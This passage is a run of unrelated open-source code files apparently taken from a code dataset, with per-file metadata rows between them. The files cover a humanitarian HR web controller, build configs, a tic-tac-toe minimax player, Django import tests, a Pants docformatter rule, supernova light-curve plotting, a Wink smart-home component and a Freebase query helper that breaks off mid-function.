table.blood_type.writable = table.blood_type.readable = True
table.medical_conditions.writable = table.medical_conditions.readable = True
table.other_details.writable = table.other_details.readable = True
else:
table = r.table
table.pe_label.readable = table.pe_label.writable = False
table.missing.readable = table.missing.writable = False
table.age_group.readable = table.age_group.writable = False
# Assume volunteers only between 12-81
table.date_of_birth.widget = S3DateWidget(past=972, future=-144)
return True
else:
# Disable non-interactive & import
return False
s3.prep = prep
# CRUD post-process
def postp(r, output):
if r.interactive and r.component:
if r.component_name == "human_resource":
# Set the minimum end_date to the same as the start_date
s3.jquery_ready.append(
'''S3.start_end_date('hrm_human_resource_start_date','hrm_human_resource_end_date')''')
if r.component_name == "experience":
# Set the minimum end_date to the same as the start_date
s3.jquery_ready.append(
'''S3.start_end_date('hrm_experience_start_date','hrm_experience_end_date')''')
return output
s3.postp = postp
output = s3_rest_controller("pr", "person",
rheader = s3db.hrm_rheader,
)
return output
# -----------------------------------------------------------------------------
def hr_search():
"""
Human Resource REST controller
- limited to just search_ac for use in Autocompletes
- allows differential access permissions
"""
# Filter
group = get_vars.get("group", None)
if group == "staff":
s3.filter = FS("human_resource.type") == 1
elif group == "volunteer":
s3.filter = FS("human_resource.type") == 2
s3.prep = lambda r: r.method == "search_ac"
return s3_rest_controller("hrm", "human_resource")
# -----------------------------------------------------------------------------
def person_search():
"""
Person REST controller
- limited to just search_ac for use in Autocompletes
- allows differential access permissions
"""
# Filter
group = get_vars.get("group", None)
if group == "staff":
s3.filter = FS("human_resource.type") == 1
elif group == "volunteer":
s3.filter = FS("human_resource.type") == 2
s3.prep = lambda r: r.method == "search_ac"
return s3_rest_controller("pr", "person")
# =============================================================================
# Teams
# =============================================================================
def group():
"""
Team controller
- uses the group table from PR
"""
return s3db.hrm_group_controller()
# -----------------------------------------------------------------------------
def group_membership():
"""
Membership controller
- uses the group_membership table from PR
"""
# Change Labels & list_fields
s3db.hrm_configure_pr_group_membership()
# Only show Relief Teams
# Do not show system groups
# Only show Staff
table = db.pr_group_membership
gtable = db.pr_group
htable = s3db.hrm_human_resource
s3.filter = (gtable.system == False) & \
(gtable.group_type == 3) & \
(htable.type == 1) & \
(htable.person_id == table.person_id)
def prep(r):
if r.method in ("create", "create.popup", "update", "update.popup"):
# Coming from Profile page?
person_id = get_vars.get("~.person_id", None)
if person_id:
field = table.person_id
field.default = person_id
field.readable = field.writable = False
return True
s3.prep = prep
output = s3_rest_controller("pr", "group_membership",
csv_template="group_membership",
csv_stylesheet=("hrm", "group_membership.xsl"),
)
return output
# =============================================================================
# Jobs
# =============================================================================
def department():
""" Departments Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
if not auth.s3_has_role(ADMIN):
s3.filter = auth.filter_by_root_org(s3db.hrm_department)
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def job_title():
""" Job Titles Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
s3.filter = FS("type").belongs((1, 3))
if not auth.s3_has_role(ADMIN):
s3.filter &= auth.filter_by_root_org(s3db.hrm_job_title)
output = s3_rest_controller()
return output
# =============================================================================
# Skills
# =============================================================================
def skill():
""" Skills Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def skill_type():
""" Skill Types Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def competency_rating():
""" Competency Rating for Skill Types Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def skill_provision():
""" Skill Provisions Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def course():
""" Courses Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
if not auth.s3_has_role(ADMIN):
s3.filter = auth.filter_by_root_org(s3db.hrm_course)
output = s3_rest_controller(rheader=s3db.hrm_rheader)
return output
# -----------------------------------------------------------------------------
def course_certificate():
""" Courses to Certificates Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def certificate():
""" Certificates Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
if settings.get_hrm_filter_certificates() and \
not auth.s3_has_role(ADMIN):
s3.filter = auth.filter_by_root_org(s3db.hrm_certificate)
output = s3_rest_controller(rheader=s3db.hrm_rheader)
return output
# -----------------------------------------------------------------------------
def certificate_skill():
""" Certificates to Skills Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def training():
""" Training Controller - used for Searching for Participants """
s3.filter = FS("person_id$human_resource.type") == 1
return s3db.hrm_training_controller()
# -----------------------------------------------------------------------------
def training_event():
""" Training Events Controller """
return s3db.hrm_training_event_controller()
# -----------------------------------------------------------------------------
def credential():
""" Credentials Controller """
s3.filter = FS("person_id$human_resource.type") == 1
return s3db.hrm_credential_controller()
# -----------------------------------------------------------------------------
def experience():
""" Experience Controller """
s3.filter = FS("person_id$human_resource.type") == 1
return s3db.hrm_experience_controller()
# -----------------------------------------------------------------------------
def competency():
"""
RESTful CRUD controller used to allow searching for people by Skill
"""
s3.filter = FS("person_id$human_resource.type") == 1
field = s3db.hrm_competency.person_id
field.widget = S3PersonAutocompleteWidget(ajax_filter = "~.human_resource.type=1")
return s3db.hrm_competency_controller()
# =============================================================================
def skill_competencies():
"""
Called by S3OptionsFilter to provide the competency options for a
particular Skill Type
"""
table = s3db.hrm_skill
ttable = s3db.hrm_skill_type
rtable = s3db.hrm_competency_rating
query = (table.id == request.args[0]) & \
(table.skill_type_id == ttable.id) & \
(rtable.skill_type_id == table.skill_type_id)
records = db(query).select(rtable.id,
rtable.name,
orderby=~rtable.priority)
response.headers["Content-Type"] = "application/json"
return records.json()
# =============================================================================
def staff_org_site_json():
"""
Used by the Asset - Assign to Person page
"""
table = s3db.hrm_human_resource
otable = s3db.org_organisation
query = (table.person_id == request.args[0]) & \
(table.organisation_id == otable.id)
records = db(query).select(table.site_id,
otable.id,
otable.name)
response.headers["Content-Type"] = "application/json"
return records.json()
# =============================================================================
def staff_for_site():
"""
Used by the Req/Req/Create page
- note that this returns Person IDs
"""
try:
site_id = request.args[0]
except:
result = current.xml.json_message(False, 400, "No Site provided!")
else:
table = s3db.hrm_human_resource
ptable = db.pr_person
query = (table.site_id == site_id) & \
(table.deleted == False) & \
(table.status == 1) & \
((table.end_date == None) | \
(table.end_date > request.utcnow)) & \
(ptable.id == table.person_id)
rows = db(query).select(ptable.id,
ptable.first_name,
ptable.middle_name,
ptable.last_name,
orderby=ptable.first_name)
result = []
append = result.append
for row in rows:
append({"id" : row.id,
"name" : s3_fullname(row)
})
result = json.dumps(result)
response.headers["Content-Type"] = "application/json"
return result
# =============================================================================
# Salaries
# =============================================================================
def staff_level():
""" Staff Levels Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
def salary_grade():
""" Salary Grade Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Insurance Information
# =============================================================================
def insurance():
""" Insurance Information Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Awards
# =============================================================================
def award_type():
""" Award Type Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
def award():
""" Awards Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Disciplinary Record
# =============================================================================
def disciplinary_type():
""" Disciplinary Type Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
def disciplinary_action():
""" Disciplinary Action Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Messaging
# =============================================================================
def compose():
""" Send message to people/teams """
return s3db.hrm_compose()
# END =========================================================================
| mit | -650,041,428,619,606,000 | 32.312581 | 111 | 0.455108 | false |
cloudnull/genastack_roles | genastack_roles/heat_engine/__init__.py | 1 | 1045 | # =============================================================================
# Copyright [2013] [Kevin Carter]
# License Information :
# This software has no warranty, it is provided 'as is'. It is your
# responsibility to validate the behavior of the routines and its accuracy
# using the code provided. Consult the GNU General Public license for further
# details (see GNU General Public License).
# http://www.gnu.org/licenses/gpl.html
# =============================================================================
BUILD_DATA = {
'heat_engine': {
'help': 'Install heat-engine from upstream',
'required': [
'python',
'heat',
'heat_client'
],
'init_script': [
{
'help': 'Start and stop heat-engine on boot',
'init_path': '/etc/init.d',
'name': 'heat-engine',
'chuid': 'heat',
'chdir': '/var/lib/heat',
'program': 'heat-engine'
}
]
}
}
| gpl-3.0 | -6,973,453,614,583,198,000 | 33.833333 | 79 | 0.449761 | false |
anuragxel/ultimate-tic-tac-toe | xxx.py | 1 | 9042 | #!/usr/bin/python
#
# Negamax variant of minmax
#
# This program is for demonstration purposes, and contains ample
# opportunities for speed and efficiency improvements.
#
# Also, a minmax tree is not the best way to program a tic-tac-toe
# player.
#
# This software is hereby granted to the Public Domain
#
import sys,os
import random
import numpy as np
import json
# from_file=np.genfromtxt("foo.csv",delimiter=",")
# all_state=np.array(from_file).tolist()
# print states
# for i in from_file:
# all_state.append(i)
INFINITY=99999999
def numStr(n):
if n == INFINITY: return "+INFINITY"
elif n == -INFINITY: return "-INFINITY"
return str(n)
def write_to_file():
global states
global f
json.dump(states,f)
f.close()
#print states
# final_add = []
# # print states
# # print all_state
# print to_print
# for e in all_state:
# if e not in final_add:
# final_add.append(e)
# np.savetxt("foo.csv",final_add,delimiter=",")
#-------------------------------------------------------------------
class MinMax(object):
def __init__(self, maxdepth=INFINITY):
self.bestmove = -1
self.maxdepth = maxdepth
def _buildtree_r(self, playboard, curplayer, depth):
"""Recursively build the minmax tree."""
# figure out the value of the board:
if depth > self.maxdepth: return 0 # who knows what the future holds
if curplayer == Board.X:
otherplayer = Board.O
else:
otherplayer = Board.X
winner = playboard.getWinner()
if winner == curplayer:
return INFINITY
elif winner == otherplayer:
return -INFINITY
elif playboard.full():
return 0 # tie game
# get a list of possible moves
movelist = playboard.getCandidateMoves()
alpha = -INFINITY
# for all the moves, recursively rate the subtrees, and
# keep all the results along with the best move:
salist = []
for i in movelist:
# make a copy of the board to mess with
board2 = playboard.copy()
board2.move(curplayer, i) # make the speculative move
subalpha = -self._buildtree_r(board2, otherplayer, depth+1)
if alpha < subalpha:
alpha = subalpha;
# keep a parallel array to the movelist that shows all the
# subtree values--we'll chose at random one of the best for
# our actual move:
if depth == 0: salist.append(subalpha)
# if we're at depth 0 and we've explored all the subtrees,
# it's time to look at the list of moves, gather the ones
# with the best values, and then choose one at random
# as our "best move" to actually really play:
if depth == 0:
candidate = []
board_state=''
for i in range(len(salist)):
if salist[i] == alpha:
candidate.append(movelist[i])
#print("Best score: %s Candidate moves: %s" % (numStr(alpha), candidate))
self.bestmove = random.choice(candidate)
# all_state.append(self.bestmove)
board_state=playboard.get_board_values()
states[board_state]=self.bestmove
return alpha
def buildtree(self, board, curplayer):
self.bestmove = -1
alpha = self._buildtree_r(board, curplayer, 0)
return self.bestmove
#-------------------------------------------------------------------
class Board(list):
"""Holds a complete board in self, row-major order."""
NONE = 0
X = 1
O = 2
def __init__(self):
for i in range(9): self.append(Board.NONE)
def copy(self):
"""Clone a board."""
b = Board()
for i in range(9):
b[i] = self[i]
return b
def move(self, color, pos):
"""Fill a position on the board."""
self[pos] = color
def getCandidateMoves(self):
"""Get a list of free moves."""
clist = []
for i in range(9):
if self[i] == Board.NONE:
clist.append(i)
return clist
def full(self):
"""Returns true if the board is full."""
for i in range(9):
if self[i] == Board.NONE:
return False
return True
def _check(self, a, b, c):
if self[a] == self[b] and self[a] == self[c] and self[a] != Board.NONE:
return self[a]
return Board.NONE
def getWinner(self):
"""Figure out who the winner is, if any."""
winner = self._check(0,1,2)
if winner != Board.NONE: return winner
winner = self._check(3,4,5)
if winner != Board.NONE: return winner
winner = self._check(6,7,8)
if winner != Board.NONE: return winner
winner = self._check(0,3,6)
if winner != Board.NONE: return winner
winner = self._check(1,4,7)
if winner != Board.NONE: return winner
winner = self._check(2,5,8)
if winner != Board.NONE: return winner
winner = self._check(0,4,8)
if winner != Board.NONE: return winner
winner = self._check(2,4,6)
if winner != Board.NONE: return winner
return Board.NONE
def get_board_values(self):
r=''
for i in range(9):
if self[i] == Board.NONE:
#r += '%d' % i
r = r+ '-'
elif self[i] == Board.X:
r = r + 'x'
elif self[i] == Board.O:
r = r+ 'o'
# if i == 2:
# r += '| 0 1 2\n%s\n' % blank
# if i == 5:
# r += '| 3 4 5\n%s\n' % blank
# if i == 8:
# r += '| 6 7 8\n%s\n' % blank
return r
def __str__(self):
""" Pretty-print the board."""
blank = '+-+-+-+'
r = blank + '\n'
for i in range(9):
r += '|'
if self[i] == Board.NONE:
#r += '%d' % i
r += ' '
elif self[i] == Board.X:
r += 'X'
elif self[i] == Board.O:
r += 'O'
if i == 2:
r += '| 0 1 2\n%s\n' % blank
if i == 5:
r += '| 3 4 5\n%s\n' % blank
if i == 8:
r += '| 6 7 8\n%s\n' % blank
return r
#-------------------------------------------------------------------
# MAIN:
# make the real board we'll be using
def main():
global f
global states
f = open('foo.csv','r+')
if os.stat("foo.csv").st_size != 0:
states = json.load(f)
f.close()
open('foo.csv', 'w').close()
f = open('foo.csv','rw+')
else:
states = {}
board = Board()
# attach it to a MinMax tree generator/evaluator, max depth 6:
mm = MinMax(6)
#sys.stdout.write("Who's first? (H)uman or (C)omputer? ")
#sys.stdout.flush()
#first = sys.stdin.readline().strip().lower()[0]
first = random.choice(['h','c'])
if first == 'h':
curplayer = Board.O # human
else:
curplayer = Board.X # computer
done = False
#sys.stdout.write("%s\n" % board)
while not done:
if board.full(): #DRAW
done = True
# print all_state
write_to_file()
#sys.stdout.write("Tie game!\n")
continue
if curplayer == Board.X:
#sys.stdout.write("Computer is thinking...\n")
# run the minmax tree for the current board
#if board.get_board_values() in states:
if board.get_board_values() in states and random.choice([True,True,False,True,False]):
move = states[board.get_board_values()]
else:
move = mm.buildtree(board, curplayer)
#sys.stdout.write("Computer's move: %s\n" % move)
else:
badMove = True
while badMove:
#sys.stdout.write("Enter a move: ");
sys.stdout.flush();
#move = int(sys.stdin.readline())
move = random.choice([0,1,2,3,4,5,6,7,8])
badMove = move < 0 or move > 8 or board[move] != Board.NONE
if move >= 0:
board.move(curplayer, move)
#sys.stdout.write("%s\n" % board)
winner = board.getWinner()
if winner == Board.X:
write_to_file()
# sys.stdout.write("X wins!\n")
done = True
elif winner == Board.O:
write_to_file()
# sys.stdout.write("O wins!\n")
done = True
# switch to other player:
if curplayer == Board.X:
curplayer = Board.O
else:
curplayer = Board.X
if __name__ == "__main__":
iterations = 5000
while iterations:
main()
iterations -= 1
| mit | 3,349,314,645,422,047,000 | 27.613924 | 98 | 0.496572 | false |
c3cashdesk/c6sh | src/tests/core/commands/test_import_member.py | 1 | 2412 | import tempfile
import pytest
from django.core.management import call_command
from postix.core.models import ListConstraint
@pytest.yield_fixture
def sample_member_file_ccc():
with tempfile.NamedTemporaryFile() as t:
t.write(
b"""chaos_number first_name last_name state
2 bezahlt
4 A B Verzug
5 C D bezahlt
8 E F bezahlt
11 G H ruhend
14 I J ruhend
23 K L bezahlt
"""
)
t.seek(0)
yield t.name
@pytest.yield_fixture
def sample_member_file_incremental_update_ccc():
with tempfile.NamedTemporaryFile() as t:
t.write(
b"""chaos_number first_name last_name state
2 bezahlt
4 A B Verzug
8 E Y bezahlt
11 G H ruhend
14 I J ruhend
23 K L ruhend
42 M N bezahlt
43 O P Verzug
"""
)
t.seek(0)
yield t.name
@pytest.mark.django_db
def test_member_import_ccc(sample_member_file_ccc):
call_command('import_member', sample_member_file_ccc)
lc = ListConstraint.objects.get(confidential=True, name='Mitglieder')
assert set((e.identifier, e.name) for e in lc.entries.all()) == {
('2', ' '),
('5', 'C D'),
('8', 'E F'),
('23', 'K L'),
}
@pytest.mark.django_db
def test_member_import_ccc_update(
sample_member_file_ccc, sample_member_file_incremental_update_ccc
):
call_command('import_member', sample_member_file_ccc)
lc = ListConstraint.objects.get(confidential=True, name='Mitglieder')
call_command('import_member', sample_member_file_incremental_update_ccc)
assert set((e.identifier, e.name) for e in lc.entries.all()) == {
('2', ' '),
(
'5',
'C D',
), # got removed from the file, but we don't detect that so we can apply partial lists as well
('8', 'E Y'), # name changed :)
('42', 'M N'),
}
@pytest.yield_fixture
def sample_member_file_local():
with tempfile.NamedTemporaryFile() as t:
t.write(
b"""CHAOSNR;NAME
1;foo
2;bar
"""
)
t.seek(0)
yield t.name
@pytest.mark.django_db
def test_member_import_local(sample_member_file_local):
call_command('import_member', sample_member_file_local, prefix='BLN')
lc = ListConstraint.objects.get(confidential=True, name='Mitglieder')
assert set((e.identifier, e.name) for e in lc.entries.all()) == {
('BLN-1', 'foo'),
('BLN-2', 'bar'),
}
| agpl-3.0 | 5,391,226,001,893,601,000 | 23.865979 | 103 | 0.612769 | false |
pyfidelity/rest-seed | backend/backrest/models/content.py | 1 | 1796 | from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import Integer
from sqlalchemy import String
from sqlalchemy import Unicode
from sqlalchemy import UnicodeText
from sqlalchemy.util import classproperty
from ..utils import utcnow
from .base import Base
def get_content(id):
""" Return content instance with the given id (or `None`). """
return Content.query.filter_by(id=id).first()
class Content(Base):
""" Base class for all content. Includes basic features such
as ownership, time stamps for modification and creation. """
@classproperty
def __mapper_args__(cls):
return dict(
polymorphic_on='type',
polymorphic_identity=cls.__name__.lower(),
with_polymorphic='*')
id = Column(Integer(), primary_key=True)
type = Column(String(30), nullable=False)
owner = Column(Unicode())
title = Column(Unicode())
description = Column(UnicodeText())
creation_date = Column(DateTime(timezone=True), nullable=False, default=utcnow)
modification_date = Column(DateTime(timezone=True), nullable=False, default=utcnow)
def __init__(self, **data):
self.add(**data)
def update(self, touch=True, **data):
""" Iterate over all columns and set values from data. """
super(Content, self).update(**data)
if touch and 'modification_date' not in data:
self.modification_date = utcnow()
def __json__(self, request):
return dict(id=self.id, title=self.title,
description=self.description,
creation_date=self.creation_date,
modification_date=self.modification_date)
def __eq__(self, other):
return isinstance(other, Content) and self.id == other.id
| bsd-2-clause | -3,919,537,068,281,949,700 | 32.886792 | 87 | 0.655902 | false |
tdyas/pants | src/python/pants/backend/python/lint/docformatter/rules.py | 1 | 5663 | # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from dataclasses import dataclass
from typing import Tuple
from pants.backend.python.lint.docformatter.subsystem import Docformatter
from pants.backend.python.lint.python_fmt import PythonFmtFieldSets
from pants.backend.python.rules import download_pex_bin, pex
from pants.backend.python.rules.pex import (
Pex,
PexInterpreterConstraints,
PexRequest,
PexRequirements,
)
from pants.backend.python.subsystems import python_native_code, subprocess_environment
from pants.backend.python.subsystems.subprocess_environment import SubprocessEncodingEnvironment
from pants.backend.python.target_types import PythonSources
from pants.core.goals.fmt import FmtFieldSet, FmtFieldSets, FmtResult
from pants.core.goals.lint import LinterFieldSets, LintResult
from pants.core.util_rules import determine_source_files, strip_source_roots
from pants.core.util_rules.determine_source_files import (
AllSourceFilesRequest,
SourceFiles,
SpecifiedSourceFilesRequest,
)
from pants.engine.fs import Digest, MergeDigests
from pants.engine.process import FallibleProcessResult, Process, ProcessResult
from pants.engine.rules import SubsystemRule, named_rule, rule
from pants.engine.selectors import Get
from pants.engine.unions import UnionRule
from pants.python.python_setup import PythonSetup
from pants.util.strutil import pluralize
@dataclass(frozen=True)
class DocformatterFieldSet(FmtFieldSet):
required_fields = (PythonSources,)
sources: PythonSources
class DocformatterFieldSets(FmtFieldSets):
field_set_type = DocformatterFieldSet
@dataclass(frozen=True)
class SetupRequest:
field_sets: DocformatterFieldSets
check_only: bool
@dataclass(frozen=True)
class Setup:
process: Process
original_digest: Digest
def generate_args(
*, specified_source_files: SourceFiles, docformatter: Docformatter, check_only: bool,
) -> Tuple[str, ...]:
return (
"--check" if check_only else "--in-place",
*docformatter.options.args,
*sorted(specified_source_files.snapshot.files),
)
@rule
async def setup(
request: SetupRequest,
docformatter: Docformatter,
python_setup: PythonSetup,
subprocess_encoding_environment: SubprocessEncodingEnvironment,
) -> Setup:
requirements_pex = await Get[Pex](
PexRequest(
output_filename="docformatter.pex",
requirements=PexRequirements(docformatter.get_requirement_specs()),
interpreter_constraints=PexInterpreterConstraints(
docformatter.default_interpreter_constraints
),
entry_point=docformatter.get_entry_point(),
)
)
if request.field_sets.prior_formatter_result is None:
all_source_files = await Get[SourceFiles](
AllSourceFilesRequest(field_set.sources for field_set in request.field_sets)
)
all_source_files_snapshot = all_source_files.snapshot
else:
all_source_files_snapshot = request.field_sets.prior_formatter_result
specified_source_files = await Get[SourceFiles](
SpecifiedSourceFilesRequest(
(field_set.sources, field_set.origin) for field_set in request.field_sets
)
)
input_digest = await Get[Digest](
MergeDigests((all_source_files_snapshot.digest, requirements_pex.digest))
)
address_references = ", ".join(
sorted(field_set.address.reference() for field_set in request.field_sets)
)
process = requirements_pex.create_process(
python_setup=python_setup,
subprocess_encoding_environment=subprocess_encoding_environment,
pex_path="./docformatter.pex",
pex_args=generate_args(
specified_source_files=specified_source_files,
docformatter=docformatter,
check_only=request.check_only,
),
input_digest=input_digest,
output_files=all_source_files_snapshot.files,
description=(
f"Run Docformatter on {pluralize(len(request.field_sets), 'target')}: "
f"{address_references}."
),
)
return Setup(process, original_digest=all_source_files_snapshot.digest)
@named_rule(desc="Format Python docstrings with docformatter")
async def docformatter_fmt(
field_sets: DocformatterFieldSets, docformatter: Docformatter
) -> FmtResult:
if docformatter.options.skip:
return FmtResult.noop()
setup = await Get[Setup](SetupRequest(field_sets, check_only=False))
result = await Get[ProcessResult](Process, setup.process)
return FmtResult.from_process_result(result, original_digest=setup.original_digest)
@named_rule(desc="Lint Python docstrings with docformatter")
async def docformatter_lint(
field_sets: DocformatterFieldSets, docformatter: Docformatter
) -> LintResult:
if docformatter.options.skip:
return LintResult.noop()
setup = await Get[Setup](SetupRequest(field_sets, check_only=True))
result = await Get[FallibleProcessResult](Process, setup.process)
return LintResult.from_fallible_process_result(result)
def rules():
return [
setup,
docformatter_fmt,
docformatter_lint,
SubsystemRule(Docformatter),
UnionRule(PythonFmtFieldSets, DocformatterFieldSets),
UnionRule(LinterFieldSets, DocformatterFieldSets),
*download_pex_bin.rules(),
*determine_source_files.rules(),
*pex.rules(),
*python_native_code.rules(),
*strip_source_roots.rules(),
*subprocess_environment.rules(),
]
| apache-2.0 | -8,875,962,643,641,155,000 | 33.530488 | 96 | 0.719054 | false |
tayebzaidi/snova_analysis | Miscellaneous/supernova_readin_plot.py | 1 | 2998 | import matplotlib.pyplot as plt
import numpy as np
import peakfinding
import smoothing
import plotter
import readin
import sys
import os
if __name__== '__main__':
#lcurve = readin.readin_aavso('aavsodata_sscyg.txt')
#mjd = lcurve.jd - 240000.5
#mag = lcurve.magnitude
#maxtab, mintab = peakfinding.peakdet(mag,1.2 , mjd)
#smoothed = smoothing.UnivariateSplinefit(mjd, mag,5)
#maxtab, mintab = peakfinding.peakdet(smoothed, 1, mjd)
#data = readin.readin_SNANA('CFA4_2006ct.dat')
#plotter.plot1D(mjd, smoothed, 'blue', 0,1)
#plotter.plot1D(mjd, mag, 'red', 1,1)
#plotter.Show()
#data = readin.readin_SNrest()
#maxp, minp = peakfinding.peakdet(data.mag, 1, data.phase)
#interp = smoothing.Interpolate1D(data.phase, data.mag)
path = "/Users/zaidi/Documents/REU/restframe/"
Mvbdata = []
delM15data = []
err_data = []
for filename in os.listdir(path):
current_file = os.path.join(path, filename)
data= readin.readin_SNrest(filename)
try:
interp = smoothing.Interpolate1D(data.phase, data.mag)
maxp, minp = peakfinding.peakdet(data.mag, 0.55, data.phase)
Mvb = smoothing.MvB(data.mag, data.phase, minp)
delM15 = smoothing.delM15(interp, data.phase, minp)
if len(minp) != 0 and len(minp) < 3:
Mvbdata.append(Mvb)
delM15data.append(delM15)
err_data.append(data.err)
'''
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(1,1,1)
ax.plot(data.phase, data.mag, 'k.', [minp[0][0]+15], interp(minp[0][0]+15), 'bo')
ax.axvline(minp[0][0])
ax.axvline(minp[0][0]+15)
ax.axhline(interp(minp[0][0]+15))
ax.axhline(minp[0][1])
plt.savefig(filename + '.png')
'''
except ValueError:
print filename, data
print data.mag, data.phase
print (len(data.mag), len(data.phase))
'''
print interp(15)
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(1,1,1)
ax.plot(data.phase, data.mag, 'k.', [15.], interp(15), 'bo')
plt.ion()
plt.show(fig)
'''
#sys.exit(-1)
'''
ax = plotter.plot1D(data.phase, interp,'blue',1, lnstyle = '-')
try:
plotter.plot1DScatter(minp[:,0], minp[:,1], 'red', 1)
except IndexError:
pass
plotter.Show()
plotter.Clear()
a = raw_input("Press Enter to continue...")
if a == "q":
break
'''
fig2 = plt.figure(2)
ax = fig2.add_subplot(1,1,1)
ax.scatter(Mvbdata, delM15data,)
ax2 = fig2.add_subplot(3,2,1)
ax2.hist(err_data, 5)
plt.show(fig2)
#plt.plot(data.phase, data.mag, linestyle = ':')
#plt.gca().invert_yaxis()
#plt.show()
| gpl-3.0 | -1,806,584,690,072,135,200 | 32.685393 | 97 | 0.53936 | false |
badele/home-assistant | homeassistant/components/wink.py | 1 | 3001 | """
homeassistant.components.wink
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Connects to a Wink hub and loads relevant components to control its devices.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/wink/
"""
import logging
from homeassistant import bootstrap
from homeassistant.loader import get_component
from homeassistant.helpers import validate_config
from homeassistant.helpers.entity import ToggleEntity
from homeassistant.const import (
EVENT_PLATFORM_DISCOVERED, CONF_ACCESS_TOKEN,
ATTR_SERVICE, ATTR_DISCOVERED, ATTR_FRIENDLY_NAME)
DOMAIN = "wink"
DEPENDENCIES = []
REQUIREMENTS = ['https://github.com/balloob/python-wink/archive/'
'42fdcfa721b1bc583688e3592d8427f4c13ba6d9.zip'
'#python-wink==0.2']
DISCOVER_LIGHTS = "wink.lights"
DISCOVER_SWITCHES = "wink.switches"
DISCOVER_SENSORS = "wink.sensors"
DISCOVER_LOCKS = "wink.locks"
def setup(hass, config):
""" Sets up the Wink component. """
logger = logging.getLogger(__name__)
if not validate_config(config, {DOMAIN: [CONF_ACCESS_TOKEN]}, logger):
return False
import pywink
pywink.set_bearer_token(config[DOMAIN][CONF_ACCESS_TOKEN])
# Load components for the devices in the Wink that we support
for component_name, func_exists, discovery_type in (
('light', pywink.get_bulbs, DISCOVER_LIGHTS),
('switch', pywink.get_switches, DISCOVER_SWITCHES),
('sensor', pywink.get_sensors, DISCOVER_SENSORS),
('lock', pywink.get_locks, DISCOVER_LOCKS)):
if func_exists():
component = get_component(component_name)
# Ensure component is loaded
bootstrap.setup_component(hass, component.DOMAIN, config)
# Fire discovery event
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: discovery_type,
ATTR_DISCOVERED: {}
})
return True
class WinkToggleDevice(ToggleEntity):
""" Represents a Wink toogle (switch) device. """
def __init__(self, wink):
self.wink = wink
@property
def unique_id(self):
""" Returns the id of this Wink switch. """
return "{}.{}".format(self.__class__, self.wink.deviceId())
@property
def name(self):
""" Returns the name of the light if any. """
return self.wink.name()
@property
def is_on(self):
""" True if light is on. """
return self.wink.state()
@property
def state_attributes(self):
""" Returns optional state attributes. """
return {
ATTR_FRIENDLY_NAME: self.wink.name()
}
def turn_on(self, **kwargs):
""" Turns the switch on. """
self.wink.setState(True)
def turn_off(self):
""" Turns the switch off. """
self.wink.setState(False)
def update(self):
""" Update state of the light. """
self.wink.updateState()
| mit | -1,104,886,890,720,861,200 | 28.712871 | 76 | 0.629124 | false |
lemoogle/iod-freebase-indexer | utils.py | 1 | 8062 | import json
import urllib
import requests
import itertools
import time
class FreebaseUtil(object):
freebase_topic_url="https://www.googleapis.com/freebase/v1/topic{}?filter=/common/topic/description&key={}"
service_url = 'https://www.googleapis.com/freebase/v1/mqlread'
aliases=[]
def __init__(self,freebase_key):
self.freebase_key=freebase_key
def runQuery(self,index,query,cursor="",category=False,description=False,):
count=100
if not cursor:
cursor = self.do_query(index,query,cursor=cursor,category=category,description=description)
while(cursor):
print cursor
count+=100
print count
open('cursor','wb').write(cursor)
cursor = self.do_query(index,query,cursor=cursor,category=category,description=description)
def do_query(self,index,query,cursor="",category=False,description=False):
params = {
'query': json.dumps(query),
'key': self.freebase_key
}
params['cursor']=cursor
url = self.service_url + '?' + urllib.urlencode(params)
response = requests.get(url).json()#json.loads(urllib2.urlopen(url).read())
